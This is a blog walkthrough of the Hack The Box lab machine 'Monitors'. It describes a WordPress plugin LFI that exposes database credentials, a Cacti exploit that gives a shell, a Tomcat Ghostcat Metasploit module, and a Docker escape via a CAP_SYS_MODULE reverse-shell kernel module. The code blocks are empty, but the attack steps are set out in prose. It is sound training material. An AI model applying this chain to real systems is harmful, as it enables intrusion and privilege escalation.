šŸ”ŽšŸ¦¶Enumeration/Foothold

Monitors is an Hard box from HTB and created by TheCyberGeek. This box features a WordPress plugin exploit via wp-with-spritz allowing for LFI/RFI and an internal docker with Apache Tomcat running. I begin each box by running a RustScan. This is bundled into my setup.sh script which I’ve mentioned in a few of my other posts. RunningĀ RustScanĀ withĀ NMAPĀ filters shows a website available onĀ Port 80. The website states ‘Sorry, direct IP access is not allowed’ but provides an admin contact detail.

admin@monitors.htb email address.

[email protected] email address.

I edit my host file and add inĀ monitors.htb.

Copy

Navigating over to the domain I see a WordPress website. Reviewing the page I can see the copyright says 2018 and the last post is from 2020. I begin a WPScan with full flags.

Running out of date WordPress.

Running out of date WordPress.

Copy

Well the scan is running I notice thatĀ wp-with-spritzĀ has been detected and its last update was 2015.

wp-with-spritz coming up as 2015 being the last update.

wp-with-spritz coming up as 2015 being the last update.

A short search later shows me an entry fromĀ ExploitDB – 44544Ā which shows an LFI/RFI available for the plugin. I tried a few RFIs to gain code execution or a shell but was unsuccessful.

Next I used the LFI (Local File Inclusion) exploit to pull theĀ WP-ConfigĀ file. WP-Config file stores the database credentials for a WordPress installation. I viewed it in source as it tends to look cleaner then the static viewing.

WP-Config file running in source.

wp-config.cfg file running in source.

I try the credentials to login to the WordPress admin but it doesn’t work. I check around a few locations for the next point of escalation. I review NMAPĀ and realize the machine is runningĀ Apache/2.4.29. I navigate to theĀ 000-default.confĀ to see if the page we saw earlier can give us any additional information or if any other hosts exists.

Running Apache/2.4.29

Running Apache/2.4.29

An additional VHOST is available.

An additional VHOST is available.

I add the new host in my hosts file and navigate over to the new sub-domain. I try the credentials found earlier in theĀ WP-ConfigĀ file and log in. It took me a second as I needed to useĀ adminĀ for the username and not wpadmin.

 

I navigate around the console looking for a file upload or script option. Next I check the version which is located at the top right of the page.

Cacti 1.2.12

Cacti 1.2.12

šŸ”Escalation

This leads me toĀ ExploitDB – 49810Ā which I pull to my Attack VM and run. I fill in the required variables and submit the request, giving my a low privilege shell.

āš  Attack Machine (Tab 1)

Copy
ExploitDB - 49810 running successfully.

ExploitDB – 49810 running successfully.

āš  Attack Machine (Tab 2)

Copy

After getting onto the machine and upgrading my shell I tried to useĀ curlĀ orĀ WGETĀ to pull files to the box and was unable to do so as they were both not installed. UsingĀ nc I pulled Linenum to the box.

šŸŽÆVictim Machine

Copy

āš  Attack Machine

Copy

Going through the endless string of results I noticeĀ cacti-backup.service. I also notice that the userĀ marcus who I was trying to escalate too had aĀ .backupĀ directory.

.backup directory in Marcus' home directory.

.backup directory in Marcus’ home directory and

cacti-backup.service running on the machine.

cacti-backup.service running on the machine.

Reviewing theĀ cacti-backup.serviceĀ I can see that theĀ .backupĀ folder m entioned earlier has a shell script inside the directory. Trying to view it gives me his credentials. IĀ suĀ to his account, grab the flag and tryĀ ssh.

cacti-backup.service showing a backup script running in .backup

cacti-backup.service showing a backup script running in .backup

Password for Marcus in backup.sh

and the password for Marcus in backup.sh

I login withĀ SSHĀ and read the note –

Copy

This must be a clue to how I progress. I check services running looking for a docker installation. I noticeĀ Port 8443Ā open which wasn’t visible on the original scan. I useĀ SSHĀ to forward the port to my local host.

Port 8443 open on the local host.

Port 8443 open on the local host.

Copy
Apache Tomcat/9.0.31 running on the localhost.

Apache Tomcat/9.0.31 running on the local host.

Viewing the page does not give me the exploit I was hoping for but I do noticeĀ Apache Tomcat/9.0.31 running which I know is constantly being exploited. A short Google late shows me that a Metasploit module is available.

Apache Tomcat/9.0.31 running on the localhost.

Apache Tomcat ‘Ghostcat’ Exploit via Metasploit

Copy

The first I ran the exploit it errored and told me to useĀ ForceExploitĀ to override. Doing this allowed me to get a meterpeter shell.

ForceExploit command used due to local host pivot.

ForceExploit command used due to local host pivot

After running the exploit I could see I was root of the docker environment. I knew next steps were to escape and escalate. I found this article on hacktricks, hacktricks – Docker Breakout.

Copy

Inside the previous output you can see that theĀ SYS_MODULEĀ capability is enabled. Going through the first link lead me to a second article focused full onĀ CAP_SYS_MODULEĀ hacktricks -CAP_SYS_MODDULE. Truthfully this part can be confusing so just follow the article as best you can.

šŸŽÆVictim Machine

Copy

āš  Attack Machine

Use the copy command (on the website) to copyĀ reverse-shell.cĀ andĀ Makefile. After theĀ reverse-shell.cĀ onĀ Line 8Ā and put in your own IP/Port. Make sure when copying theĀ MakefileĀ you tab the blank char before each word. When done launch a web server and pull both files to the machine.

Copy

šŸ“œ Makefile

Copy

šŸ“œ reverse-shell.c

Copy

After we runĀ reverse-shell.koĀ on the docker VM our reverse shell pops and we are root.

Root on Monitors from HTB.

Root on Monitors from HTB.

Copy

Rooted

Published On: October 9th, 2021 / Categories: HTB, Technology / Tags: , , , , , , , /

Leave A Comment